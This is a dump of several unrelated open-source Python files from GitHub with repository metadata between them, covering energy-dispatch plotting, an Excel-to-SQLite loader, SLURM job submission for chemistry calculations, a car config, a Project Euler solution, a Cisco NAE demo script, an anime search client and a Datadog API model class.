'print_option': 0,
'search_option': 'max'
}
#study_variable_dict_3 = {
# 'window_size': 5*24,
# 'data': results['DISPATCH_FROM_WIND'],
# 'print_option': 0,
# 'search_option': 'max'
# }
study_output_1 = func_find_period(study_variable_dict_1)
study_output_2 = func_find_period(study_variable_dict_2)
start_hour1 = study_output_1['left_index']
end_hour1 = study_output_1['right_index']
start_hour2 = study_output_2['left_index']
end_hour2 = study_output_2['right_index']
##=======================================================
# Figure size settings
##=======================================================
#plt.rcParams.update({'axes.titlesize': 'large'})
#plt.rcParams.update({'axes.labelsize': 'large'})
#
##import matplotlib.pylab as pylab
##params = {'legend.fontsize': 'large',
## 'figure.figsize': (7, 3.5),
## 'axes.labelsize': 'x-large',
## 'axes.titlesize':'large',
## 'xtick.labelsize':'large',
## 'ytick.labelsize':'large'}
##pylab.rcParams.update(params)
##=================================================
#Convert hours to datetime units for plotting
##=================================================
months = [0]
months.append(months[0] + 31*24)
months.append(months[1] + 28*24)
months.append(months[2] + 31*24)
months.append(months[3] + 30*24)
months.append(months[4] + 31*24)
months.append(months[5] + 30*24)
months.append(months[6] + 31*24)
months.append(months[7] + 31*24)
months.append(months[8] + 30*24)
months.append(months[9] + 31*24)
months.append(months[10] + 30*24)
months.append(months[11] + 31*24)
#Start hours is 2015, 9, 6, 12
#End hours is 2015, 9, 11, 12
def convert_start_end (start_hour, end_hour):
start_m = -1
start_h = -1
start_d = -1
hours_remaining_in_month = -1
for i, month in enumerate(months):
if start_hour < month:
start_m = i
hours_remaining_in_month = start_hour - months[i-1]
break
if hours_remaining_in_month > 0:
start_d = hours_remaining_in_month // 24 + 1
start_h = hours_remaining_in_month % 24
else:
print("Error")
print("start_m, start_d, start_h")
print(start_m, start_d, start_h)
end_m = -1
end_h = -1
end_d = -1
hours_remaining_in_month = -1
for i, month in enumerate(months):
if end_hour < month:
end_m = i
hours_remaining_in_month = end_hour - months[i-1]
break
if hours_remaining_in_month > 0:
end_d = hours_remaining_in_month // 24 + 1
end_h = hours_remaining_in_month % 24
else:
print("Error")
print("end_m, end_d, end_h")
print(end_m, end_d, end_h)
return start_m, start_d, start_h, end_m, end_d, end_h
##=================================================
# Two subplots, unpack the axes array immediately
#fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
#ax1.plot(x, y)
#ax1.set_title('Sharing Y axis')
#ax2.scatter(x, y)
##=================================================
#PGP MAX 5-DAYS
print("PGP MAX 5-days")
times = convert_start_end (start_hour1 -6, end_hour1 -6)
#The -6 is to convert from UTC to CST
#date1 = datetime.datetime(2018, times[0], times[1], times[2])
#date2 = datetime.datetime(2018, times[3], times[4], times[5])
date1 = datetime.datetime(2018, times[0], times[1], times[2])
date2 = datetime.datetime(2018, times[3], times[4], times[5])
delta = datetime.timedelta(hours=1)
dates = drange(date1, date2, delta)
print(len(dates))
#x = np.arange(start_hour, end_hour)
x = dates
start_hour = start_hour1
end_hour = end_hour1
demand_source1 = demand_source[start_hour:end_hour]
wind_source1 = wind_source[start_hour:end_hour]
solar_source1 = solar_source[start_hour:end_hour]
pgp_source1 = pgp_source[start_hour:end_hour]
batt_source1 = batt_source[start_hour:end_hour]
demand_sink1 = np.multiply(demand_sink[start_hour:end_hour],-1)
batt_sink1 = np.multiply(batt_sink[start_hour:end_hour],-1)
pgp_sink1 = np.multiply(pgp_sink[start_hour:end_hour],-1)
y1 = np.vstack([wind_source1, solar_source1, pgp_source1, batt_source1 ])
pal1 = [wind_c, solar_c, pgp_c,batt_c]
labels1 = ["Wind", "Solar", "LDS", "Battery" ]
y2 = np.vstack([demand_sink1, pgp_sink1, batt_sink1])
pal2 = [dem_c, pgp_c,batt_c ]
labels2 = ["Demand"]
#fig, ax = plt.subplots()
ax1 = plt.subplot2grid((2, 4), (0, 3), colspan=1, rowspan=2)
#ax1 = plt.subplot(325)
ax1.stackplot(x, y1, colors=pal1, labels=labels1)
ax1.stackplot(x, y2, colors=pal2, labels=labels2)
ax1.plot(x, demand_source1, '-', color=dem_c, linewidth=1.2)
#ax1.set_title('Max PGP dispatch')
ax1.set_xlim(dates[0], dates[-1])
ax1.set_ylim(-2, 2)
ax1.legend(loc='upper center', bbox_to_anchor=(1.45, 1.02))
chartBox = ax1.get_position()
ax1.set_position([chartBox.x0, chartBox.y0, chartBox.width*1, chartBox.height])
#ax.xaxis.set_major_locator(AutoDateLocator())
#ax.xaxis.set_major_locator(HourLocator(interval=24))
ax1.xaxis.set_major_locator(HourLocator(byhour=range(24),interval=24))
#ax1.xaxis.set_major_locator(HourLocator(byhour=(24),interval=24))
#ax1.xaxis.set_major_formatter(DateFormatter('%b %dth')) #This is CST!!! 7am
ax1.xaxis.set_major_formatter(DateFormatter('%b %d')) #This is CST!!! 7am
#ax1.xaxis.set_major_formatter(DateFormatter('%d-%b%H:%M')) #This is CST!!! 7am
plt.setp(ax1.get_yticklabels(), visible=False)
ax1.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.xticks(rotation=30, ha='right')
ax1.xaxis.set_tick_params(direction='out', which='both')
ax1.yaxis.set_tick_params(direction='out', which='both')
#ax1.set_ylabel('Electricity sources and sinks (kW)')
#ax1.set_xlabel('Time')
#fig.autofmt_xdate()
#ax.set_xlabel('Expensive $\longleftrightarrow$ Cheap\nBaseline PGP capacity cost =\n 1x electrolyzer ($1,100/kW), \n1x fuel cell ($4,600/kW), \n 1x storage ($0.30/kWh)')
#plt.savefig('5day_PGP.pdf', bbox_inches='tight')
#plt.show()
##=================================================
#Batt Max 5-DAYS
print("Batt MAX 5-days")
#The -6 is to convert from UTC to CST
times = convert_start_end (start_hour2 -6, end_hour2 -6)
#date1 = datetime.datetime(2015, times[0], times[1], times[2])
#date2 = datetime.datetime(2015, times[3], times[4], times[5])
#print('batt start', times[0], times[1], times[2])
#print('batt end', times[3], times[4], times[5])
date1 = datetime.datetime(2018, times[0], times[1], times[2])
date2 = datetime.datetime(2018, times[3], times[4], times[5])
delta = datetime.timedelta(hours=1)
dates = drange(date1, date2, delta)
print(len(dates))
#x = np.arange(start_hour, end_hour)
x = dates
start_hour = start_hour2
end_hour = end_hour2
demand_source2 = demand_source[start_hour:end_hour]
wind_source2 = wind_source[start_hour:end_hour]
solar_source2 = solar_source[start_hour:end_hour]
pgp_source2 = pgp_source[start_hour:end_hour]
batt_source2 = batt_source[start_hour:end_hour]
demand_sink2 = np.multiply(demand_sink[start_hour:end_hour],-1)
batt_sink2 = np.multiply(batt_sink[start_hour:end_hour],-1)
pgp_sink2 = np.multiply(pgp_sink[start_hour:end_hour],-1)
y1 = np.vstack([wind_source2, solar_source2, pgp_source2, batt_source2 ])
pal1 = [wind_c, solar_c, pgp_c,batt_c]
labels1 = ["Wind", "Solar", "PGP", "Battery" ]
y2 = np.vstack([demand_sink2, pgp_sink2, batt_sink2])
pal2 = [dem_c, pgp_c,batt_c ]
labels2 = ["Demand"]
#fig, ax = plt.subplots()
ax2 = plt.subplot2grid((2, 4), (0, 2), colspan=1, rowspan=2)
#ax2 = plt.subplot(326, sharey=ax1)
ax2.stackplot(x, y1, colors=pal1, labels=labels1)
ax2.stackplot(x, y2, colors=pal2, labels=labels2)
ax2.plot(x, demand_source2, '-', color=dem_c, linewidth=1.2)
#ax2.set_title('Max battery dispatch')
plt.setp(ax2.get_yticklabels(), visible=False)
ax2.set_xlim(dates[0], dates[-1])
ax2.set_ylim(-2, 2)
#ax2.legend(loc='upper center', bbox_to_anchor=(1.45, 1.02))
chartBox = ax2.get_position()
ax2.set_position([chartBox.x0, chartBox.y0, chartBox.width*1, chartBox.height])
#ax.xaxis.set_major_locator(AutoDateLocator())
#ax.xaxis.set_major_locator(HourLocator(interval=24))
ax2.xaxis.set_major_locator(HourLocator(byhour=range(24),interval=24))
#ax2.xaxis.set_major_formatter(DateFormatter('%d-%b-%H:%M')) #This is CST!!! Midnight
#ax2.xaxis.set_major_formatter(DateFormatter('%b %dth')) #This is CST!!! Midnight
ax2.xaxis.set_major_formatter(DateFormatter('%b %d')) #This is CST!!! Midnight
ax2.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.xticks(rotation=30, ha='right')
ax2.xaxis.set_tick_params(direction='out', which='both')
ax2.yaxis.set_tick_params(direction='out', which='both')
#ax2.set_ylabel('Electricity sources and sinks (kW)')
#ax2.set_xlabel('Time')
#fig.autofmt_xdate()
#ax.set_xlabel('Expensive $\longleftrightarrow$ Cheap\nBaseline PGP capacity cost =\n 1x electrolyzer ($1,100/kW), \n1x fuel cell ($4,600/kW), \n 1x storage ($0.30/kWh)')
#plt.savefig('5day_Batt.pdf', bbox_inches='tight')
#plt.show()
#fig.text(0.5, 0.04, 'Time', ha='center')
fig.text(0.06, 0.5, 'Electricty sources and sinks (kW)', va='center', rotation='vertical', size='xx-large' )
fig.text(.135, 0.84, 'a)', size='large')
fig.text(.54, 0.84, 'b)', size='large')
fig.text(.74, 0.84, 'c)', size='large')
#plt.savefig('figure1.pdf', bbox_inches='tight')
#plt.show()
plt.savefig('figs/figure2_dispatch.pdf', bbox_inches='tight')
plt.savefig('eps/figure2_dispatch.eps', bbox_inches='tight')
plt.show() | [
"noreply@github.com"
] | jacquelinedowling.noreply@github.com |
f5d9a6715a5c77400adeb0a9d8f34f25b9e4de0d | 680301f1213d1bc3a7d50e4fcde044d1a2f76c3a | /Excel_to_Python/excel_to_sqlite/excel_to_sqlite.py | 16e2dd28c6775e24c762a860b10ac5662bab2a94 | [] | no_license | marquis90/Code | 0501e9e69040f3be30f91c9a3e3eee2942a93466 | 78030ff17e5597bc79dec0a720a1f386239f4dc1 | refs/heads/master | 2021-09-15T22:52:29.754322 | 2018-06-12T05:42:29 | 2018-06-12T05:42:29 | 103,601,356 | 0 | 0 | null | 2017-09-15T02:42:38 | 2017-09-15T01:51:04 | Python | UTF-8 | Python | false | false | 728 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 13:35:10 2017
@author: jinjianfei
"""
import sqlite3 as sq3
import pandas as pd
import numpy as np
path = 'C:/Users/jinjianfei/.spyder2-py3/'
query = 'CREATE TABLE 资料 (代码 PRIMARY text ,价格 real,简称 text,评级 text, 剩余期限 real,估值 real,前一日估值 real,债券类别 text,成交日期 date)'
con = sq3.connect(path+'最终.db')
con.commit()
df = pd.read_excel('Excel文件.xlsx',index_col='代码')
df.to_sql('最终',con)
con.commit()
# 可成功读取Excel文件,转换为pandas的dataframe格式,然后存储到sqlite中。数据库文件有一个表“资料”,数据库文件名为“最终.db” | [
"noreply@github.com"
] | marquis90.noreply@github.com |
0d0fd83548e4bb7b0511e289f2049081975ea794 | cc1eeda3cdf405f838c8bc6015ff9196e4b1fec4 | /xtb_ts_test/control_xtb_ts.py | 7d112915ce919537481c069a990db91346e27de6 | [] | no_license | jensengroup/ReactionDiscovery | ad6f726193e8941849438eadd0043f6612078b4d | 49b60fea9ec4002ea75fb874cf8175c9be98f73f | refs/heads/main | 2023-06-27T12:56:13.899986 | 2021-07-26T14:00:33 | 2021-07-26T14:00:33 | 343,810,751 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,077 | py | #!/groups/kemi/mharris/.conda/envs/rdkit_2020_09/bin/python
import tarfile
import sys
import os
import textwrap
import time
import shutil
import numpy as np
import pandas as pd
def qsub_prep(job_name, job_dir, script_path, ts_guess, rsmi, psmi, cpus, mem):
"""
write qsub file for SLURM submission
"""
pwd = os.getcwd()
qsub_file = """\
#!/bin/sh
#SBATCH --job-name={0}
#SBATCH --nodes=1
#SBATCH --cpus-per-task={1}
#SBATCH --mem={2}G
#SBATCH --error={3}/{0}.stderr
#SBATCH --output={3}/{0}.stdout
#SBATCH --ntasks=1
#SBATCH --time=100:00:00
#SBATCH --partition=kemi1
#SBATCH --no-requeue
cp {8}/{0}/{5} /scratch/$SLURM_JOB_ID
export GAUSS_SCRDIR=/scratch/$SLURM_JOB_ID
cd /scratch/$SLURM_JOB_ID
#run python code
({4} {5} '{6}' '{7}' {1} {2})
cp -r ts_test_xtb {3}/{8}/{0}/
""".format(job_name, cpus, mem, pwd, script_path, ts_guess, rsmi, psmi,
job_dir)
with open(str(job_name) + "_qsub.tmp", "w") as qsub:
qsub.write(textwrap.dedent(qsub_file))
return str(job_name) + "_qsub.tmp"
def check_path_interpolation(directory):
os.chdir(directory)
files = [f for f in os.listdir(os.curdir) if \
f.endswith("xtbout")]
files.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))
max_energy = None
for file_name in files:
with open(file_name, 'r') as _file:
line = _file.readline()
while line:
if 'TOTAL ENERGY' in line:
energy_au = np.float(line.split()[3])
line = _file.readline()
if not max_energy:
max_energy = energy_au
ts_guess = file_name[:-6]+'xyz'
if energy_au > max_energy:
max_energy = energy_au
ts_guess = file_name[:-6]+'xyz'
#os.remove(file_name)
print(ts_guess, max_energy)
os.chdir('../')
return ts_guess, max_energy
def find_ts_guess(directory):
"""
when sp calculations ar efinished: find the structure with maximum xtb
energy
"""
ts_guess_paths = []
ts_guess_energies = []
os.chdir(directory)
high_temperature = False
if os.path.exists('ht'):
os.chdir('ht')
high_temperature = True
paths = [d for d in os.listdir(os.curdir) if d.startswith('path') and os.path.isdir(d)]
print(paths)
for path in paths:
ts_guess, max_energy = check_path_interpolation(path)
ts_guess_paths.append(path+'/'+ts_guess)
ts_guess_energies.append(max_energy)
ts_guess = ts_guess_paths[ts_guess_energies.index(max(ts_guess_energies))]
if high_temperature:
os.chdir('../')
ts_guess = 'ht/'+ts_guess
#os.mkdir('ts_test_xtb_tmp')
#shutil.copy(ts_guess, 'ts_test_xtb_tmp')
os.chdir('../../../')
return ts_guess
def run_calculations(df, script_path, cpus, mem, max_queue):
"""
For each reaction in the dataframe: do an xTB TS optimization with Gaussian
optimizer. afterwards do IRC to check TS corresponds to intended reaction.
Submits jobs when queue below max_queue
"""
print(df)
submitted_jobs = set()
for job_name, reactant, r_idx, letter in zip(df.index, df.reactant,
df.r_idx, df.letter):
_dir = "{0}/{0}_{1}_{2}".format(reactant, r_idx, letter)
os.mkdir(_dir+'_xtb')
tar = tarfile.open(_dir+'.tar.gz', 'r:gz')
tar.extractall(path=_dir+'_xtb')
tar.close()
ts_guess = find_ts_guess(_dir+'_xtb/'+str(job_name))
rsmi = df.loc[job_name, 'reactant_smiles_am']
psmi = df.loc[job_name, 'product_smiles_am']
qsub_name = qsub_prep(job_name, _dir+'_xtb', script_path, ts_guess, rsmi,
psmi, cpus, mem)
slurmid = os.popen("sbatch " + qsub_name).read()
slurmid = int(slurmid.strip().split()[-1])
submitted_jobs.add(slurmid)
if len(submitted_jobs) >= max_queue:
while True:
job_info = os.popen("squeue -u mharris").readlines()[1:]
current_jobs = {int(job.split()[0]) for job in job_info}
if len(current_jobs) >= max_queue:
time.sleep(15)
else:
finished_jobs = submitted_jobs - current_jobs
for job in finished_jobs:
submitted_jobs.remove(job)
break
while True:
job_info = os.popen("squeue -u mharris").readlines()[1:]
current_jobs = {int(job.split()[0]) for job in job_info}
if len(current_jobs) > 0:
time.sleep(15)
else:
break
if __name__ == "__main__":
df = pd.read_csv(sys.argv[1], index_col=0)
df_under40 = df[df.barrier < 40]
script_path='/groups/kemi/mharris/github/xtb_ts_test/run_xtb_ts.py'
cpus = 1
mem = 2
max_queue = 300
#print(df_under30)
run_calculations(df_under40, script_path, cpus, mem, max_queue)
| [
"mharris@fend02.cluster"
] | mharris@fend02.cluster |
703ee05d7de6a86442dadcdb673707cd9653b0db | e9f04d0d5b92e038a437900ae142136613c03f09 | /car/car-config.py | 12139c2bb8ac0298f0d6acce1bb812c052961adf | [] | no_license | pitkane/donkeyx | fbf950908a2bf618ab8a7f57a1317e5cd0b52989 | c027683d7e4fc43ec70655c498ada59e4935898f | refs/heads/master | 2020-05-24T09:04:10.057245 | 2019-06-03T12:38:16 | 2019-06-03T12:38:16 | 187,197,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | """
CAR CONFIG
This file is read by your car application's car.py script to change the car
performance.
"""
import os
# PATHS
CAR_PATH = PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_PATH = os.path.join(CAR_PATH, 'data')
MODELS_PATH = os.path.join(CAR_PATH, 'models')
# VEHICLE
DRIVE_LOOP_HZ = 20
MAX_LOOPS = 100000
# CAMERA
CAMERA_RESOLUTION = (120, 160) # (height, width)
CAMERA_FRAMERATE = DRIVE_LOOP_HZ
# STEERING
STEERING_CHANNEL = 1
STEERING_LEFT_PWM = 420
STEERING_RIGHT_PWM = 360
# THROTTLE
THROTTLE_CHANNEL = 0
THROTTLE_FORWARD_PWM = 400
THROTTLE_STOPPED_PWM = 360
THROTTLE_REVERSE_PWM = 310
# TRAINING
BATCH_SIZE = 128
TRAIN_TEST_SPLIT = 0.8
TUB_PATH = os.path.join(CAR_PATH, 'tub') # if using a single tub
| [
"mikko@mbit.fi"
] | mikko@mbit.fi |
6b5991808844bf4bf53bb9ef1f2ba289ed0cbe2d | 6846a0469efc79b89edc8f856944d5a8005d7244 | /id_0123.py | 8f711263e8087edcc8d3178a22f25e1d21fd0249 | [] | no_license | CGenie/project_euler | 42cb966e13645339490046eb44a729660ae0c092 | cc90edd061b0f4d9e076d5a684b842c202a6812a | refs/heads/master | 2020-06-05T00:41:49.266961 | 2014-01-13T19:11:31 | 2014-01-13T19:11:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 992 | py | #!/usr/bin/python
# #####################################################################
# id_0123.py
#
# Przemyslaw Kaminski <cgenie@gmail.com>
# Time-stamp: <>
######################################################################
from helper_py3 import memoize
def gen_primes():
lst_primes = [2]
yield 2
p = 3
while True:
prime = True
for x in lst_primes:
if p % x == 0:
prime = False
break
if prime:
lst_primes.append(p)
yield p
p += 2
if __name__ == '__main__':
gp = gen_primes()
M = 10**10
n = 0
while True:
pn = next(gp)
n += 1
if pn**2 >= M:
ret = ((-1)**n + 1 + ((-1)**(n - 1) + 1)*n*pn) % pn**2
if (n + 1) % 100 == 0:
print("pn = " + str(pn) + ", n = " + str(n) + ", ret = " + str(ret))
if ret > M:
print("sol = " + str(n))
break
| [
"cgenie@gmail.com"
] | cgenie@gmail.com |
b110cba2ae81ea5ae37394a185a52841af63e9ca | af69680c21d666b089cba68cbe50852290b0be58 | /test_pcv.py | 32e1bba9495f0bc46dbaafadffb10afb0bab87d7 | [] | no_license | camrossi/cnae | b7c32a5dbbed27366a119b0a9ff2d3e353504578 | b59773517dee2f70ff8381905285f7fd77f6a410 | refs/heads/master | 2021-06-25T10:32:55.392323 | 2020-11-17T01:22:55 | 2020-11-17T01:22:55 | 166,747,103 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,379 | py | # This script will pre-configure a NAE appliance for some demo time.
# I expect the appliance to be with no config, if an object already exist I will not update it, the object creation will just fail and I move on.
# To do: Move the configuration snippet outside of this file.
import cnae
import logging
import time
import argparse
import getpass
from pprint import pprint
# Enble logging at debug level
logger = logging.getLogger('cnae')
logger.setLevel(logging.INFO)
def get_args():
parser = argparse.ArgumentParser(description="Prepare an NAE appliace for Demo Time!")
parser.add_argument('-u', dest='user', help='Username, default: admin', default='admin')
parser.add_argument('-d', dest='domain', help='Login Domain, defaul: Local',default='Local')
parser.add_argument('-i', dest='nae_ip', help='IP address of the NAE Appliance',required=True)
args = parser.parse_args()
return args
def deltaAnalysis(ag_name):
epochs = nae.getEpochs(ag_name)
epochs_id = []
# Do a delta analysis only if there are 2+ epochs
if len(epochs) >= 2:
for e in epochs:
epochs_id.append(e['epoch_id'])
#pair the epochs together and drop the last pair, I do not need newest-oldest epoch pair.
#This creates one delta analysis between every epoch
epoch_pairs = (list(zip(epochs_id, epochs_id[1:] + epochs_id[:1])))
epoch_pairs.pop()
#Start epoch delta
i = 1
for e in epoch_pairs:
name = ag_name+ '_' + str(i)
nae.newDeltaAnalysis(name, prior_epoch_uuid=e[0], later_epoch_uuid=e[1])
i = i + 1
args= get_args()
nae_password = "C@ndidadmin1234"
#nae_password = getpass.getpass()
#Create NAE Object
nae = cnae.NAE (args.nae_ip)
#Log in to NAE with user and password
nae.login(args.user, nae_password,args.domain)
# Create PCV
changes ='''[
{
"fvTenant": {
"attributes": {
"descr": "",
"nameAlias": "",
"userdom": "all",
"dn": "uni/tn-I_ROCK",
"name": "123",
"pcv_status": "created"
},
"children": []
}
},
{
"fvTenant": {
"attributes": {
"descr": "",
"nameAlias": "",
"userdom": "all",
"dn": "uni/tn-I_ROCK_MUCH",
"name": "456",
"pcv_status": "created"
},
"children": []
}
},
{
"physDomP": {
"attributes": {
"dn": "uni/phys-NAE-pdom",
"name": "NAE-pdom",
"nameAlias": "",
"ownerKey": "",
"ownerTag": "",
"userdom": ""
}
}
},
{
"infraInfra": {
"attributes": {
"childAction": "",
"dn": "uni/infra"
},
"children": [
{
"infraAttEntityP": {
"attributes": {
"annotation": "orchestrator:aci-containers-controller",
"descr": "",
"dn": "uni/infra/attentp-NAE_AEP",
"name": "NAE_AEP",
"nameAlias": "",
"ownerKey": "",
"ownerTag": "",
"userdom": ""
}
}
}
]
}
}
]'''
nae.newManualPCV(changes = changes,ag_name="Pre Change Verification",name="TestSuper", description="dCloud Demo")
| [
"camrossi@cisco.com"
] | camrossi@cisco.com |
315cd8059a96c4b238904b69055cc4a26063453f | ccf177ecde3d195a057334b2d7c59c371086e735 | /nl_interface/search.py | 1229f6cd81af1b1bf87ce85066c95e0f3414317c | [
"MIT"
] | permissive | amrishparmar/Sammy-for-MyAnimeList | 3fec7bb3fda0752f967d48d4877cd32e9c686ca2 | 507d9749fc0022d7600bf90b673506fd8cf3de11 | refs/heads/master | 2021-08-28T21:08:43.327372 | 2020-12-09T15:59:44 | 2020-12-09T15:59:44 | 79,809,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | import html
from enum import Enum
import click
import requests
from bs4 import BeautifulSoup
import agent
import network
import ui
class StatusCode(Enum):
"""An Enum represented the type of result of database searches"""
NO_RESULTS = 0
USER_CANCELLED = 1
def display_entry_details(entry):
"""Display all the details of a given entry
:param entry: an anime or manga entry as a Beautiful Soup Tag object
"""
for detail in entry.children:
# ignore newlines in children
if detail != "\n":
# replace in tag name the underscores with spaces and convert to title case
detail_name = detail.name.replace("_", " ").title()
# set the string to be the detail.string by default
detail_string = detail.string
# check that the string contains something
if detail_string is not None:
# unescape html entities and remove break tags
detail_string = html.unescape(detail_string).replace("<br />", "")
detail_string = detail_string.replace("[i]", "").replace("[/i]", "")
click.echo("{}: {}".format(detail_name, detail_string))
def search(credentials, search_type, search_string, display_details=True):
"""Search for an anime or manga entry
:param credentials: A tuple containing valid MAL account details in the format (username, password)
:param search_type: A string denoting the media type to search for, should be either "anime" or "manga"
:param search_string: A string, the anime or manga to search for
:param display_details: A boolean, whether to print the details of the found entry or whether to just return it
:return: A beautiful soup tag, or a network status code if there was an error or the user quit
"""
if search_type not in ["anime", "manga"]:
raise ValueError("Invalid argument for {}, must be either {} or {}.".format(search_type, "anime", "manga"))
url = "https://myanimelist.net/api/{}/search.xml?q={}".format(search_type, search_string.replace(" ", "+"))
# send the async search request to the server
r = ui.threaded_action(network.make_request, "Searching for \"{}\"".format(search_string), request=requests.get,
url=url, auth=credentials, stream=True)
# check if there was an error with the user's internet connection
if r == network.StatusCode.CONNECTION_ERROR:
agent.print_connection_error_msg()
return r
if r.status_code == 204:
agent.print_msg("I'm sorry I could not find any results for \"{}\".".format(search_string))
return StatusCode.NO_RESULTS
elif r.status_code == 200:
# decode the raw content so beautiful soup can read it as xml not a string
r.raw.decode_content = True
soup = BeautifulSoup(r.raw, "xml")
# get all entries
matches = soup.find_all("entry")
# store the length of all_matched list since needed multiple times
num_results = len(matches)
if num_results == 1:
if display_details:
display_entry_details(matches[0])
else:
return matches[0]
else:
agent.print_msg("I found {} results. Did you mean:".format(num_results))
# iterate over the matches and print them out
for i in range(num_results):
# use a different layout for entries that don't have any synonyms
title_format = "{}> {} ({})" if matches[i].synonyms.get_text() != "" else "{}> {}"
click.echo(title_format.format(i + 1, matches[i].title.get_text(), matches[i].synonyms.get_text()))
click.echo("{}> [None of these]".format(num_results + 1))
# get a valid choice from the user
while True:
option = click.prompt("Please choose an option", type=int)
if 1 <= option <= num_results + 1:
break
else:
click.echo("You must enter a value between {} and {}".format(1, num_results + 1))
click.echo()
# check that the user didn't choose the none of these option before trying to display entry
if option != num_results + 1:
if display_details:
display_entry_details(matches[option - 1])
else:
return matches[option - 1]
else:
return StatusCode.USER_CANCELLED
else:
agent.print_msg("There was an error getting the entry on your list. Please try again.")
return network.StatusCode.OTHER_ERROR
| [
"aparm001@gold.ac.uk"
] | aparm001@gold.ac.uk |
e6eed95b3212fccef9210436c4333489b1221298 | 714472087861374f9cb79e627d305ae01415d940 | /18_d3/parse.py | 40fdaa2f116cf5a45aa28154338ccda188e36fb3 | [] | no_license | jacksonzou123/SoftDev | be02082166a96bb9b59e7a575449199b08dd2e88 | 9ed6a3c54749ba42e943edf5aac968f0fd4c2084 | refs/heads/master | 2020-07-23T16:47:32.499516 | 2020-04-22T16:49:57 | 2020-04-22T16:49:57 | 207,635,463 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | from pprint import pprint
from operator import itemgetter
import json
# OPTION OUTPUT FUNCTION FOR ORGANIZATION
def output(data, head):
output = [head]
file = open('output.csv','w')
for item in data:
output.append(','.join(item) + '\n')
file.writelines(output)
def parse():
# DATA CLEANING
f = open('leadingcauses.csv','r')
f = f.readlines()
data = []
for line in f[1:]:
if 'New York' in line and 'All Causes' not in line:
t = line[:-1].split(',')
entry = [t[0],t[-5],int(''.join(t[-3:][:-1]).strip('"'))]
data.append(entry)
# ORGANIZING DATA INTO NESTED DICT
datadict = {}
for item in data:
if item[0] not in datadict.keys():
datadict[item[0]] = {}
if item[1] not in datadict[item[0]].keys():
datadict[item[0]][item[1]] = item[2]
datadict = json.dumps(datadict)
return datadict
| [
"jzou00@stuy.edu"
] | jzou00@stuy.edu |
6a22e8f4dffd272e12fba138916e4c7de47b0cfc | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /src/datadog_api_client/v1/model/geomap_widget_definition.py | a47dba11739a217d6ebe6cc92133fe5fc63bbc9e | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 5,014 | py | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from __future__ import annotations
from typing import List, Union, TYPE_CHECKING
from datadog_api_client.model_utils import (
ModelNormal,
cached_property,
unset,
UnsetType,
)
if TYPE_CHECKING:
from datadog_api_client.v1.model.widget_custom_link import WidgetCustomLink
from datadog_api_client.v1.model.geomap_widget_request import GeomapWidgetRequest
from datadog_api_client.v1.model.geomap_widget_definition_style import GeomapWidgetDefinitionStyle
from datadog_api_client.v1.model.widget_time import WidgetTime
from datadog_api_client.v1.model.widget_text_align import WidgetTextAlign
from datadog_api_client.v1.model.geomap_widget_definition_type import GeomapWidgetDefinitionType
from datadog_api_client.v1.model.geomap_widget_definition_view import GeomapWidgetDefinitionView
class GeomapWidgetDefinition(ModelNormal):
validations = {
"requests": {
"max_items": 1,
"min_items": 1,
},
}
@cached_property
def openapi_types(_):
from datadog_api_client.v1.model.widget_custom_link import WidgetCustomLink
from datadog_api_client.v1.model.geomap_widget_request import GeomapWidgetRequest
from datadog_api_client.v1.model.geomap_widget_definition_style import GeomapWidgetDefinitionStyle
from datadog_api_client.v1.model.widget_time import WidgetTime
from datadog_api_client.v1.model.widget_text_align import WidgetTextAlign
from datadog_api_client.v1.model.geomap_widget_definition_type import GeomapWidgetDefinitionType
from datadog_api_client.v1.model.geomap_widget_definition_view import GeomapWidgetDefinitionView
return {
"custom_links": ([WidgetCustomLink],),
"requests": ([GeomapWidgetRequest],),
"style": (GeomapWidgetDefinitionStyle,),
"time": (WidgetTime,),
"title": (str,),
"title_align": (WidgetTextAlign,),
"title_size": (str,),
"type": (GeomapWidgetDefinitionType,),
"view": (GeomapWidgetDefinitionView,),
}
attribute_map = {
"custom_links": "custom_links",
"requests": "requests",
"style": "style",
"time": "time",
"title": "title",
"title_align": "title_align",
"title_size": "title_size",
"type": "type",
"view": "view",
}
def __init__(
self_,
requests: List[GeomapWidgetRequest],
style: GeomapWidgetDefinitionStyle,
type: GeomapWidgetDefinitionType,
view: GeomapWidgetDefinitionView,
custom_links: Union[List[WidgetCustomLink], UnsetType] = unset,
time: Union[WidgetTime, UnsetType] = unset,
title: Union[str, UnsetType] = unset,
title_align: Union[WidgetTextAlign, UnsetType] = unset,
title_size: Union[str, UnsetType] = unset,
**kwargs,
):
"""
This visualization displays a series of values by country on a world map.
:param custom_links: A list of custom links.
:type custom_links: [WidgetCustomLink], optional
:param requests: Array of one request object to display in the widget. The request must contain a ``group-by`` tag whose value is a country ISO code.
See the `Request JSON schema documentation <https://docs.datadoghq.com/dashboards/graphing_json/request_json>`_
for information about building the ``REQUEST_SCHEMA``.
:type requests: [GeomapWidgetRequest]
:param style: The style to apply to the widget.
:type style: GeomapWidgetDefinitionStyle
:param time: Time setting for the widget.
:type time: WidgetTime, optional
:param title: The title of your widget.
:type title: str, optional
:param title_align: How to align the text on the widget.
:type title_align: WidgetTextAlign, optional
:param title_size: The size of the title.
:type title_size: str, optional
